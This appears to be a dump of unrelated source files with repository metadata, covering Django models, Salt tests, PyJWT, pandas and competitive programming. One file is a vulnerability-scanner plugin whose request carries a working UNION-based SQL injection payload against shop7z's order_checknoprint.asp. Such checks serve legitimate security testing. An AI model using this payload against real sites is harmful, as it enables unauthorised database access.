A = list(map(int,input().split()))
LRV = [list(map(int,input().split())) for i in range(Q)]
dif = []
ans = 0
for i in range(N-1):
dif.append(A[i+1]-A[i])
for i in range(N-1):
ans += abs(dif[i])
for i in range(Q):
L,R,V = map(lambda x: x-1,LRV[i])
V += 1
if L > 0:
ans -= abs(dif[L-1])
dif[L-1] += V
ans += abs(dif[L-1])
if R < N-1:
ans -= abs(dif[R])
dif[R] -= V
ans += abs(dif[R])
print(ans)
if __name__ == '__main__':
main()
| [
"megumu112851@gmail.com"
] | megumu112851@gmail.com |
5b09999136264f3b86f6cc291e202df18999fb3c | 5fd59608e3b0ea2a92ac19f9104f7a9a7c10bd03 | /apps/components/floors/models.py | 1d6656253db58a9a35934385d3f2eefc22f5ecc2 | [] | no_license | tmac408/makahiki | 47251470e1db3ee2fa6a7fdfd5ac83153dd7945a | c489bc6870a755bcb4c830be9c112047afde9fbe | refs/heads/master | 2021-01-10T20:35:27.096381 | 2011-07-05T04:27:54 | 2011-07-05T04:27:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,973 | py | import datetime
from django.db import models
from django.contrib.auth.models import User
from django.template.defaultfilters import slugify
from django.db.models import Sum, Max, Q
from components.makahiki_base import get_floor_label, get_current_round
# Create your models here.
class Dorm(models.Model):
# Automatically populate slug field when the name is added.
prepopulated_fields = {"slug": ("name",)}
name = models.CharField(max_length=200, help_text="The name of the dorm.")
slug = models.SlugField(max_length=20, help_text="Automatically generated if left blank.")
created_at = models.DateTimeField(editable=False);
updated_at = models.DateTimeField(null=True, editable=False)
def __unicode__(self):
return self.name
def floor_points_leaders(self, num_results=10, round_name=None):
"""
Returns the top points leaders for the given dorm.
"""
if round_name:
return self.floor_set.filter(
profile__scoreboardentry__round_name=round_name
).annotate(
points=Sum("profile__scoreboardentry__points"),
last=Max("profile__scoreboardentry__last_awarded_submission")
).order_by("-points", "-last")[:num_results]
return self.floor_set.annotate(
points=Sum("profile__points"),
last=Max("profile__last_awarded_submission")
).order_by("-points", "-last")[:num_results]
def save(self, *args, **kwargs):
"""Custom save method to generate slug and set created_at/updated_at."""
if not self.slug:
self.slug = slugify(self.name)
if not self.created_at:
self.created_at = datetime.date.today()
else:
self.updated_at = datetime.date.today()
super(Dorm, self).save()
class Floor(models.Model):
prepopulated_fields = {"slug": ("number",)}
number = models.CharField(help_text="The floor number in the dorm. Can be a string value", max_length=10)
slug = models.SlugField(max_length=10, help_text="Automatically generated if left blank.")
dorm = models.ForeignKey(Dorm, help_text="The dorm this floor belongs to.")
floor_identifier = models.CharField(
max_length=200,
blank=True,
null=True,
help_text="Name of the source used in WattDepot to refer to this floor."
)
def __unicode__(self):
return "%s: %s %s" % (self.dorm.name, get_floor_label(), self.number)
@staticmethod
def floor_points_leaders(num_results=10, round_name=None):
"""
Returns the floor points leaders across all dorms.
"""
if round_name:
return Floor.objects.filter(
profile__scoreboardentry__round_name=round_name
).annotate(
points=Sum("profile__scoreboardentry__points"),
last=Max("profile__scoreboardentry__last_awarded_submission")
).order_by("-points", "-last")[:num_results]
return Floor.objects.annotate(
points=Sum("profile__points"),
last=Max("profile__last_awarded_submission")
).order_by("-points", "-last")[:num_results]
def points_leaders(self, num_results=10, round_name=None):
"""
Gets the individual points leaders for the floor.
"""
if round_name:
return self.profile_set.filter(
scoreboardentry__round_name=round_name
).order_by("-scoreboardentry__points", "-scoreboardentry__last_awarded_submission")[:num_results]
return self.profile_set.all().order_by("-points", "-last_awarded_submission")[:num_results]
def current_round_rank(self):
current_round = get_current_round()
if current_round:
return self.rank(round_name=current_round)
return None
def rank(self, round_name=None):
"""Returns the rank of the floor across all dorms."""
if round_name:
from components.makahiki_profiles.models import ScoreboardEntry
aggregate = ScoreboardEntry.objects.filter(
profile__floor=self,
round_name=round_name
).aggregate(points=Sum("points"), last=Max("last_awarded_submission"))
points = aggregate["points"] or 0
last_awarded_submission = aggregate["last"]
# Group by floors, filter out other rounds, and annotate.
annotated_floors = ScoreboardEntry.objects.values("profile__floor").filter(
round_name=round_name
).annotate(
floor_points=Sum("points"),
last_awarded=Max("last_awarded_submission")
)
else:
aggregate = self.profile_set.aggregate(points=Sum("points"), last=Max("last_awarded_submission"))
points = aggregate["points"] or 0
last_awarded_submission = aggregate["last"]
annotated_floors = Floor.objects.annotate(
floor_points=Sum("profile__points"),
last_awarded_submission=Max("profile__last_awarded_submission")
)
count = annotated_floors.filter(floor_points__gt=points).count()
# If there was a submission, tack that on to the count.
if last_awarded_submission:
count = count + annotated_floors.filter(
floor_points=points,
last_awarded_submission__gt=last_awarded_submission
).count()
return count + 1
def current_round_points(self):
"""Returns the number of points for the current round."""
current_round = get_current_round()
if current_round:
return self.points(round_name=current_round)
return None
def points(self, round_name=None):
"""Returns the total number of points for the floor. Takes an optional parameter for a round."""
if round_name:
from components.makahiki_profiles.models import ScoreboardEntry
dictionary = ScoreboardEntry.objects.filter(profile__floor=self, round_name=round_name).aggregate(Sum("points"))
else:
dictionary = self.profile_set.aggregate(Sum("points"))
return dictionary["points__sum"] or 0
def save(self):
"""Custom save method to generate slug and set created_at/updated_at."""
if not self.slug:
self.slug = slugify(self.number)
super(Floor, self).save()
class Post(models.Model):
"""Represents a wall post on a user's wall."""
user = models.ForeignKey(User)
floor = models.ForeignKey(Floor)
text = models.TextField()
style_class = models.CharField(max_length=50, default="user_post") #CSS class to apply to this post.
created_at = models.DateTimeField(editable=False)
def date_string(self):
"""Formats the created date into a pretty string."""
return self.created_at.strftime("%m/%d %I:%M %p")
def save(self):
if not self.created_at:
self.created_at = datetime.datetime.today()
super(Post, self).save()
class PostComment(models.Model):
user = models.ForeignKey(User)
post = models.ForeignKey(Post)
text = models.TextField()
created_at = models.DateTimeField(editable=False)
def save(self):
if not self.created_at:
self.created_at = datetime.date.today()
super(PostComment, self).save() | [
"keoki.lee@gmail.com"
] | keoki.lee@gmail.com |
45e77e2a9c803a25003af8d423e528ff7874eea9 | bd9a09a3f1a8b2b5166c540ada93cc5b30591605 | /scanner/plugins/cms/shop7z/shop7z_order_checknoprint_sqli.py | 85f9412e216939cff4178425a6cdb8666ba5093a | [
"MIT"
] | permissive | iceyhexman/onlinetools | 3cb6e349fc30c515f96429abeab5fbcc430ac0cc | 61f2df7ff8e6ad97ca7901728c3ab749679a2bd0 | refs/heads/master | 2023-08-06T19:31:51.328657 | 2022-10-28T04:01:38 | 2022-10-28T04:01:38 | 119,565,769 | 1,662 | 358 | MIT | 2023-03-31T14:34:13 | 2018-01-30T16:51:46 | Python | UTF-8 | Python | false | false | 1,414 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: shop7z order_checknoprint.asp SQL注入
referer: http://www.wooyun.org/bugs/wooyun-2010-068345
author: Lucifer
description: 文件order_checknoprint.asp中,参数id存在SQL注入。
'''
import sys
import requests
class shop7z_order_checknoprint_sqli_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/order_checknoprint.asp?checkno=1&id=1%20UNION%20SELECT%201%2C2%2CCHR%2832%29%2bCHR%2835%29%2bCHR%28116%29%2bCHR%28121%29%2bCHR%28113%29%2bCHR%2835%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C38%2C39%2C40%2C41%2C42%20from%20MSysAccessObjects"
vulnurl = self.url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
if r"#tyq#" in req.text:
return "[+]存在shop7z order_checknoprint.asp SQL注入漏洞...(高危)\tpayload: "+vulnurl
except:
return "[-]connect timeout"
if __name__ == "__main__":
testVuln = shop7z_order_checknoprint_sqli_BaseVerify(sys.argv[1])
testVuln.run() | [
"834430486@qq.com"
] | 834430486@qq.com |
0fbf2d8f2f31b5556b486c568da417a2ac0933a1 | 4b379051aa3430eb2d8931f6055772731dcb199d | /512-Python_основы_и_применение/24471/stepik-512_24471-step7.py | 8ead90784919d275251ba0e63a734f6a778ab201 | [] | no_license | dmikos/stepikCourse | 1416614ef51a4352374f37e86e3211c3b42cbaf6 | 3faeabfdc56cac597fb6b1495e7bb38a7f2a6816 | refs/heads/master | 2021-01-12T17:06:37.720050 | 2016-11-21T14:37:20 | 2016-11-21T14:37:20 | 69,057,420 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,043 | py | import requests
import re
from urllib.parse import urlparse
# link = input()
link = "http://hosting.ukrtelecom.ua/stepik-512_24471-step7.html"
# link = "http://pastebin.com/raw/2mie4QYa"
#test3
# link = "http://pastebin.com/raw/7543p0ns"
# link = "http://hosting.ukrtelecom.ua/stepik-512_24471-step7-test3.html"
pattern = re.compile(r"href *= *[',\"].+[',\"]")
res = pattern.findall(requests.get(link).text)
finset = set()
for line in res:
line = re.split(r"[',\"]", str(line))[1]
if line.startswith("../"):
continue
elif urlparse(line).scheme == '':
# finset.add((urlparse(line).path).split(':')[0]) if urlparse(line).port else finset.add(urlparse(line).path)
finset.add(urlparse(line).path)
elif urlparse(line).scheme:
finset.add((urlparse(line).netloc).split(':')[0]) if urlparse(line).port else finset.add(urlparse(line).netloc)
# print(sorted(finset))
for stroke in sorted(finset):
print(stroke)
"""
Output
mail.ru
neerc.ifmo.ru
stepic.org
www.ya.ru
ya.ru
""" | [
"dkostinov@gmail.com"
] | dkostinov@gmail.com |
67aa0ecaa841b2950f17b83d5e2e87f4235094b3 | 0a1e4f7105aba084054eaf32e2000efaa564a3cd | /Chap 7/viet_hoa_ten.py | b59b4001c9bd0093bfc5f8ef44fe983fb78fbcb8 | [] | no_license | tucpy/basic_python | b322cf4def209b165a4cd84994f13c41d14d3ec7 | 28adf05c1ef3f81dbcc034daea370d5e5b7b6ad6 | refs/heads/master | 2020-03-29T01:13:52.067014 | 2018-10-27T01:31:15 | 2018-10-27T01:31:15 | 149,378,072 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py |
chuoi = str(input("Nhap ho va ten: "))
list_tu = chuoi.split()
print(list_tu)
chuoi_xu_ly =""
for tu in list_tu:
tu_xu_ly = tu.capitalize()
chuoi_xu_ly += tu_xu_ly +" "
print(chuoi_xu_ly) | [
"phtu05@gmail.com"
] | phtu05@gmail.com |
630141755dcdf5e0317aa3414d0bb6b99e0586e3 | 12b34dcd389dec2095ef454d9dc89976ff7c7215 | /code/one_max_multiprocessing.py | 402d190d1a000a9391c9f19e047fb9994c41ae2f | [] | no_license | mariosky/PPSN2014 | ce0d64a3f61b36b467acab33297481a7e590dcf0 | a2ce8971951e2af311146d74cb043e68ff90cc67 | refs/heads/master | 2020-05-30T12:03:01.086997 | 2014-11-23T17:01:41 | 2014-11-23T17:01:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,192 | py | __author__ = 'mariosky'
from multiprocessing import Pool
import one_max
import time, yaml
config = yaml.load(open("conf/conf.yaml"))
experiment = "w%d-%d-p%d" % (config["NUMBER_OF_WORKERS"],config["SAMPLE_SIZE"],config["POPULATION_SIZE"])
experiment_id = experiment + "-%d" % round(time.time(),0)
datafile = open("data/one_max-"+experiment_id+".dat","a")
conf_out = open("conf/one_max-"+experiment_id+".yaml","w")
yaml.dump(config, conf_out)
conf_out.close()
for i in range(30):
print '############################'
print '############################'
start = time.time()
one_max.initialize(config)
tInitialize = time.time()-start
print i, tInitialize
p = Pool(config["NUMBER_OF_WORKERS"])
params = [(w, config) for w in range(config["NUMBER_OF_WORKERS"])]
start = time.time()
results = p.map(one_max.work, params)
#print results
tTotal = time.time()-start
totals = "%d,%0.2f,%0.2f" % (i, round(tTotal,2), round(tInitialize,2))
print totals
datafile.write(totals + '\n')
for worker_list in results:
for data_list in worker_list:
datafile.write(str(i) +"," + ",".join(map(str,data_list)) + '\n')
| [
"mariosky@gmail.com"
] | mariosky@gmail.com |
614d791a27c148a546020e8be0519f9e59df2dd7 | 23f5ef8f31ff54f7166c98f76c00c6fef0dd9caa | /tests/pytests/unit/test_beacons.py | 27940c6f65e5d151e712147a056ff67a91c4cbd1 | [
"Apache-2.0",
"MIT",
"BSD-2-Clause"
] | permissive | afischer-opentext-com/salt | 42bfe2e6e1a86bf8dd30b5a6db4d8e575ac9ca99 | b011a4ed6b29e3d2e8242e5909721dcda75d14df | refs/heads/master | 2022-10-25T00:01:07.138687 | 2021-09-27T16:24:02 | 2021-09-27T16:46:43 | 407,080,050 | 0 | 0 | Apache-2.0 | 2021-09-16T08:12:53 | 2021-09-16T08:12:52 | null | UTF-8 | Python | false | false | 2,476 | py | """
unit tests for the beacon_module parameter
"""
import logging
import salt.config
from tests.support.mock import MagicMock, call, patch
log = logging.getLogger(__name__)
def test_beacon_process():
"""
Test the process function in the beacon class
returns the correct information when an exception
occurs
"""
mock_opts = salt.config.DEFAULT_MINION_OPTS.copy()
mock_opts["id"] = "minion"
mock_opts["__role"] = "minion"
mock_opts["beacons"] = {
"watch_apache": [
{"processes": {"apache2": "stopped"}},
{"beacon_module": "ps"},
]
}
beacon_mock = MagicMock(side_effect=Exception("Global Thermonuclear War"))
beacon_mock.__globals__ = {}
beacon = salt.beacons.Beacon(mock_opts, [])
found = "ps.beacon" in beacon.beacons
beacon.beacons["ps.beacon"] = beacon_mock
ret = beacon.process(mock_opts["beacons"], mock_opts["grains"])
_expected = [
{
"tag": "salt/beacon/minion/watch_apache/",
"error": "Global Thermonuclear War",
"data": {},
"beacon_name": "ps",
}
]
assert ret == _expected
def test_beacon_module():
"""
Test that beacon_module parameter for beacon configuration
"""
mock_opts = salt.config.DEFAULT_MINION_OPTS.copy()
mock_opts["id"] = "minion"
mock_opts["__role"] = "minion"
mock_opts["beacons"] = {
"watch_apache": [
{"processes": {"apache2": "stopped"}},
{"beacon_module": "ps"},
]
}
beacon = salt.beacons.Beacon(mock_opts, [])
ret = beacon.process(mock_opts["beacons"], mock_opts["grains"])
_expected = [
{
"tag": "salt/beacon/minion/watch_apache/",
"data": {"id": "minion", "apache2": "Stopped"},
"beacon_name": "ps",
}
]
assert ret == _expected
# Ensure that "beacon_name" is available in the call to the beacon function
name = "ps.beacon"
mocked = {name: MagicMock(return_value=_expected)}
mocked[name].__globals__ = {}
calls = [
call(
[
{"processes": {"apache2": "stopped"}},
{"beacon_module": "ps"},
{"_beacon_name": "watch_apache"},
]
)
]
with patch.object(beacon, "beacons", mocked) as patched:
beacon.process(mock_opts["beacons"], mock_opts["grains"])
patched[name].assert_has_calls(calls)
| [
"mwilhite@vmware.com"
] | mwilhite@vmware.com |
d3cf863162bbc543d350c11218e6b2157ca672c3 | 23759c9e64e6ce82f4d7472b1f9c027b2d34bdad | /01 - News App(Unfinished)/webapp/main/migrations/0004_auto_20200809_0023.py | 50b59513ae34d90868220ea3c96f81de63aa7d3f | [] | no_license | TanimSk/Django-Archive | 77ce5912da5108ff5fd7d95d4e66d1961a3a5bb9 | 69710877df284a85f7b66e9ddb14b8bbb3c90eef | refs/heads/master | 2023-01-29T15:08:41.478146 | 2020-12-05T09:14:41 | 2020-12-05T09:14:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 690 | py | # Generated by Django 3.1 on 2020-08-08 18:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0003_auto_20200807_1810'),
]
operations = [
migrations.AddField(
model_name='main_start',
name='facebook',
field=models.TextField(default='-'),
),
migrations.AddField(
model_name='main_start',
name='github',
field=models.TextField(default='-'),
),
migrations.AddField(
model_name='main_start',
name='youtube',
field=models.TextField(default='-'),
),
]
| [
"61817579+baseplate-admin@users.noreply.github.com"
] | 61817579+baseplate-admin@users.noreply.github.com |
9ea3047f9eafa6f106e1402425b14554e09a4be8 | 962fb0927fd2dc998f17a59809b0a508bb043ec0 | /tests/test_app.py | 0351d91848f829e2d4c0cab03b15c6faffbc6b66 | [
"MIT"
] | permissive | mozillazg/tinyq | 9653680c20e00cf973df68cd1c7224a5d8380dcf | fd9ecc593931c9b315c4aeb9150389b3e4ae670e | refs/heads/master | 2023-08-23T21:18:37.207385 | 2017-06-19T14:03:06 | 2017-06-19T14:03:06 | 72,210,812 | 14 | 2 | null | null | null | null | UTF-8 | Python | false | false | 409 | py | # -*- coding: utf-8 -*-
def test_app_delay(app):
@app.task()
def count(x, y):
return x + y
count.delay(1, 2)
assert len(app.schedule_queue.connection.keys('*')) == 1
assert app.schedule_queue.dequeue()
def test_app_call(app):
@app.task()
def count(x, y):
return x + y
assert count(1, 2) == 3
assert len(app.schedule_queue.connection.keys('*')) == 0
| [
"mozillazg101@gmail.com"
] | mozillazg101@gmail.com |
67569ed3a331217728b35b752ffc10ee42b26f69 | 7394e662a54b5df7307dc0f7a0a7d4ef4d1c045f | /event/models.py | 582a91fee88950db874c607e4109f7b03de98e24 | [] | no_license | Aman563/spectrum-server | a16660c043d7c98a80cf94296e9535cab50e9297 | f41cc13735f1e3a79f22be380bb9ed55489bed03 | refs/heads/master | 2020-04-21T20:58:33.367627 | 2018-01-23T14:34:24 | 2018-01-23T14:34:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,545 | py | from __future__ import unicode_literals
from django.db import models
# Create your models here.
from register.models import UserData
class EventData(models.Model):
name = models.CharField(max_length=120, blank=True, null=True)
round_name = models.CharField(max_length=120, blank=True, null=True)
# rules = models.CharField(max_length=800, blank=True, null=True)
image = models.ImageField(upload_to='event/', default="/media/event/default.png")
image_blur = models.ImageField(upload_to='event/', default="/media/event/default.png")
image_landscape = models.ImageField(upload_to='event/', default="/media/event/default.png")
time = models.CharField(max_length=120, blank=True, null=True)
date = models.CharField(max_length=255, blank=True, null=True)
type = models.IntegerField(default=1, blank=True, null=True)
location = models.CharField(max_length=120, blank=True, null=True)
day = models.IntegerField(default=0, blank=True, null=True)
attendees = models.IntegerField(default=0, blank=True, null=True)
# description = models.CharField(max_length=800, blank=True, null=True)
prize_description = models.CharField(max_length=120, blank=True, null=True)
round = models.IntegerField(default=1, blank=True, null=True)
facebook_url = models.CharField(max_length=255, blank=True, null=True)
rules = models.TextField(max_length=1000, null=True, blank=True, default="")
description = models.TextField(max_length=1000, null=True, blank=True, default="")
modified = models.DateTimeField(auto_now=True, auto_now_add=False)
created = models.DateTimeField(auto_now=False, auto_now_add=True)
def __unicode__(self):
return self.name
class UserEventData(models.Model):
user = models.ForeignKey(UserData, null=True)
event = models.ForeignKey(EventData, null=True)
participated = models.IntegerField(default=0, blank=True, null=True)
modified = models.DateTimeField(auto_now=True, auto_now_add=False)
created = models.DateTimeField(auto_now=False, auto_now_add=True)
def __unicode__(self):
return self.user.name
class OrganiserData(models.Model):
name = models.CharField(max_length=120, blank=True, null=True)
mobile = models.CharField(max_length=120, blank=True, null=True)
event = models.ForeignKey(EventData, null=True)
modified = models.DateTimeField(auto_now=True, auto_now_add=False)
created = models.DateTimeField(auto_now=False, auto_now_add=True)
def __unicode__(self):
return self.name
| [
"ujjwal.iitism@gmail.com"
] | ujjwal.iitism@gmail.com |
ddfc0ba313bcc76af69e40d2021eb67ef443f3b8 | f3f616801184633a40d767c7f71b3e375fd166d1 | /hackerearth/events/june_circuits/set-2/little_boruto_and_rail_ways/test.py | d1209cc7da862a3d413d6c58a2469cbd1232519c | [
"MIT"
] | permissive | amarish-kumar/coding-challenges | cf0668114929c4cccd92944c1b8cb9c6e029ab9d | d5f998c738058d06a0217fb54f9f03a646384bce | refs/heads/master | 2020-03-21T10:26:08.919197 | 2017-05-20T13:58:50 | 2017-05-20T13:58:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,056 | py | from unittest import TestCase, main as ut_main
import solution as sol
class TestSolution(TestCase):
def test_detect_disjoint_graph(self):
n = 3
edges = [[1, 2], [2, 3]]
graph, nodes = self.make_graph_and_node_list(n, edges)
self.assertEqual(self.start1(sol.detect_disjoint_graph(nodes, graph, n)), [1, 2, 3])
def make_graph_and_node_list(self, n, edges):
graph = sol.make_graph_from_edges(n, edges)
nodes = map(lambda i : i, range(0, n))
return graph, nodes
def start1(self, nodes):
return map(lambda i : i + 1, nodes)
def test_get_all_disjoint_graphs(self):
def test(n, edges, result):
graph, _ = self.make_graph_and_node_list(n, edges)
graphs = map(self.start1, sol.get_all_disjoint_graphs(graph, n))
self.assertEqual(graphs, result)
test(3, [[1, 2]], [[1, 2], [3]])
test(3, [[1, 2], [2, 3]], [[1, 2, 3]])
test(5, [[1, 2], [2, 3]], [[1, 2, 3], [4], [5]])
test(5, [[1, 2], [2, 3], [4, 5]], [[1, 2, 3], [4, 5]])
test(5, [], map(lambda i : [i], range(1, 6)))
if __name__ == '__main__':
ut_main()
| [
"babaiscool@gmail.com"
] | babaiscool@gmail.com |
523cecdfdf690e90f4c33ca6a4f3482ee0066c0b | 6d4c5e79bb36785d5bb127e263aac50cb6729a88 | /venv/Lib/site-packages/jwt/api_jws.py | 5accb1b50077b0d06551fb01ff2c4efebc8b14cc | [] | no_license | Galymbekov/BackWebDevProject | a7683fc205d467629f4ad132370ff4b5ac535277 | 3343fd277bc8994bec3d484072a8ed5f1d99b6bb | refs/heads/main | 2023-04-14T14:06:13.888793 | 2021-04-30T12:12:37 | 2021-04-30T12:12:37 | 362,004,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,095 | py | import binascii
import json
import warnings
try:
# import required by mypy to perform type checking, not used for normal execution
from typing import Callable, Dict, List, Optional, Union # NOQA
except ImportError:
pass
from .algorithms import (
Algorithm, get_default_algorithms, has_crypto, requires_cryptography # NOQA
)
from .compat import Mapping, binary_type, string_types, text_type
from .exceptions import (
DecodeError, InvalidAlgorithmError, InvalidSignatureError,
InvalidTokenError
)
from .utils import base64url_decode, base64url_encode, force_bytes, merge_dict
class PyJWS(object):
header_typ = 'JWT'
def __init__(self, algorithms=None, options=None):
self._algorithms = get_default_algorithms()
self._valid_algs = (set(algorithms) if algorithms is not None
else set(self._algorithms))
# Remove algorithms that aren't on the whitelist
for key in list(self._algorithms.keys()):
if key not in self._valid_algs:
del self._algorithms[key]
if not options:
options = {}
self.options = merge_dict(self._get_default_options(), options)
@staticmethod
def _get_default_options():
return {
'verify_signature': True
}
def register_algorithm(self, alg_id, alg_obj):
"""
Registers a new Algorithm for use when creating and verifying tokens.
"""
if alg_id in self._algorithms:
raise ValueError('Algorithm already has a handler.')
if not isinstance(alg_obj, Algorithm):
raise TypeError('Object is not of type `Algorithm`')
self._algorithms[alg_id] = alg_obj
self._valid_algs.add(alg_id)
def unregister_algorithm(self, alg_id):
"""
Unregisters an Algorithm for use when creating and verifying tokens
Throws KeyError if algorithm is not registered.
"""
if alg_id not in self._algorithms:
raise KeyError('The specified algorithm could not be removed'
' because it is not registered.')
del self._algorithms[alg_id]
self._valid_algs.remove(alg_id)
def get_algorithms(self):
"""
Returns a list of supported values for the 'alg' parameter.
"""
return list(self._valid_algs)
def encode(self,
payload, # type: Union[Dict, bytes]
key, # type: str
algorithm='HS256', # type: str
headers=None, # type: Optional[Dict]
json_encoder=None # type: Optional[Callable]
):
segments = []
if algorithm is None:
algorithm = 'none'
if algorithm not in self._valid_algs:
pass
# Header
header = {'typ': self.header_typ, 'alg': algorithm}
if headers:
self._validate_headers(headers)
header.update(headers)
json_header = force_bytes(
json.dumps(
header,
separators=(',', ':'),
cls=json_encoder
)
)
segments.append(base64url_encode(json_header))
segments.append(base64url_encode(payload))
# Segments
signing_input = b'.'.join(segments)
try:
alg_obj = self._algorithms[algorithm]
key = alg_obj.prepare_key(key)
signature = alg_obj.sign(signing_input, key)
except KeyError:
if not has_crypto and algorithm in requires_cryptography:
raise NotImplementedError(
"Algorithm '%s' could not be found. Do you have cryptography "
"installed?" % algorithm
)
else:
raise NotImplementedError('Algorithm not supported')
segments.append(base64url_encode(signature))
return b'.'.join(segments)
def decode(self,
jwt, # type: str
key='', # type: str
verify=True, # type: bool
algorithms=None, # type: List[str]
options=None, # type: Dict
**kwargs):
merged_options = merge_dict(self.options, options)
verify_signature = merged_options['verify_signature']
if verify_signature and not algorithms:
warnings.warn(
'It is strongly recommended that you pass in a ' +
'value for the "algorithms" argument when calling decode(). ' +
'This argument will be mandatory in a future version.',
DeprecationWarning
)
payload, signing_input, header, signature = self._load(jwt)
if not verify:
warnings.warn('The verify parameter is deprecated. '
'Please use verify_signature in options instead.',
DeprecationWarning, stacklevel=2)
elif verify_signature:
self._verify_signature(payload, signing_input, header, signature,
key, algorithms)
return payload
def get_unverified_header(self, jwt):
"""Returns shop the JWT header parameters as a dict()
Note: The signature is not verified so the header parameters
should not be fully trusted until signature verification is complete
"""
headers = self._load(jwt)[2]
self._validate_headers(headers)
return headers
def _load(self, jwt):
if isinstance(jwt, text_type):
jwt = jwt.encode('utf-8')
if not issubclass(type(jwt), binary_type):
raise DecodeError("Invalid token type. Token must be a {0}".format(
binary_type))
try:
signing_input, crypto_segment = jwt.rsplit(b'.', 1)
header_segment, payload_segment = signing_input.split(b'.', 1)
except ValueError:
raise DecodeError('Not enough segments')
try:
header_data = base64url_decode(header_segment)
except (TypeError, binascii.Error):
raise DecodeError('Invalid header padding')
try:
header = json.loads(header_data.decode('utf-8'))
except ValueError as e:
raise DecodeError('Invalid header string: %s' % e)
if not isinstance(header, Mapping):
raise DecodeError('Invalid header string: must be a json object')
try:
payload = base64url_decode(payload_segment)
except (TypeError, binascii.Error):
raise DecodeError('Invalid payload padding')
try:
signature = base64url_decode(crypto_segment)
except (TypeError, binascii.Error):
raise DecodeError('Invalid crypto padding')
return (payload, signing_input, header, signature)
def _verify_signature(self, payload, signing_input, header, signature,
key='', algorithms=None):
alg = header.get('alg')
if algorithms is not None and alg not in algorithms:
raise InvalidAlgorithmError('The specified alg value is not allowed')
try:
alg_obj = self._algorithms[alg]
key = alg_obj.prepare_key(key)
if not alg_obj.verify(signing_input, key, signature):
raise InvalidSignatureError('Signature verification failed')
except KeyError:
raise InvalidAlgorithmError('Algorithm not supported')
def _validate_headers(self, headers):
if 'kid' in headers:
self._validate_kid(headers['kid'])
def _validate_kid(self, kid):
if not isinstance(kid, string_types):
raise InvalidTokenError('Key ID header parameter must be a string')
_jws_global_obj = PyJWS()
encode = _jws_global_obj.encode
decode = _jws_global_obj.decode
register_algorithm = _jws_global_obj.register_algorithm
unregister_algorithm = _jws_global_obj.unregister_algorithm
get_unverified_header = _jws_global_obj.get_unverified_header
| [
"47265977+Galymbekov@users.noreply.github.com"
] | 47265977+Galymbekov@users.noreply.github.com |
eb6cddd566669ce91d865ba2e42ef6b5cef7277d | 517a904955033092aec11288151d725548226abc | /pandas_tutorial/data_io/to_json.py | a0ffb8e0237c8dd06a3f62e4a2bca9ba237e9763 | [] | no_license | MinSu-Kim/python_tutorial | ae0a4e3570aa4cb411626cefbc031777364764d5 | ed0c08892822d7054161c9e8f98841370868e82d | refs/heads/master | 2021-06-16T16:15:30.349719 | 2021-05-26T04:59:47 | 2021-05-26T04:59:47 | 207,266,202 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 511 | py | import pandas as pd
# 판다스 DataFrame() 함수로 데이터프레임 변환. 변수 df에 저장
data = {'name': ['Jerry', 'Riah', 'Paul'],
'algol': ["A", "A+", "B"],
'basic': ["C", "B", "B+"],
'c++': ["B+", "C", "C+"],
}
df = pd.DataFrame(data)
df.set_index('name', inplace=True) # name 열을 인덱스로 지정
print(df)
print("# to_json() 메소드를 사용하여 JSON 파일로 내보내기. 파열명은 df_sample.json로 저장")
df.to_json("./df_sample.json")
| [
"net94.teacher@gmail.com"
] | net94.teacher@gmail.com |
fa10145e9aa1763d721507e88caccee956b9b069 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_snag.py | 346b4d7003fc041b6b0c9bffbf125482ebf69e9b | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py |
#calss header
class _SNAG():
def __init__(self,):
self.name = "SNAG"
self.definitions = [u'a problem, difficulty, or disadvantage: ', u'a tear, hole, or loose thread in a piece of clothing or cloth caused by a sharp or rough object: ', u'informal for sausage ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
992ef5c5a51c47b4863fce8bcfdfbd2c973bb95d | be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1 | /Gauss_v45r9/Gen/DecFiles/options/14103050.py | 600b4f3f3becc10dbe313d0fbf4ba87e67483ba9 | [] | no_license | Sally27/backup_cmtuser_full | 34782102ed23c6335c48650a6eaa901137355d00 | 8924bebb935b96d438ce85b384cfc132d9af90f6 | refs/heads/master | 2020-05-21T09:27:04.370765 | 2018-12-12T14:41:07 | 2018-12-12T14:41:07 | 185,989,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 751 | py | # file /home/hep/ss4314/cmtuser/Gauss_v45r9/Gen/DecFiles/options/14103050.py generated: Fri, 27 Mar 2015 16:10:10
#
# Event Type: 14103050
#
# ASCII decay Descriptor: [B_c+ -> (B0 -> K+ K-) pi+]cc
#
from Configurables import Generation
Generation().EventType = 14103050
Generation().SampleGenerationTool = "Special"
from Configurables import Special
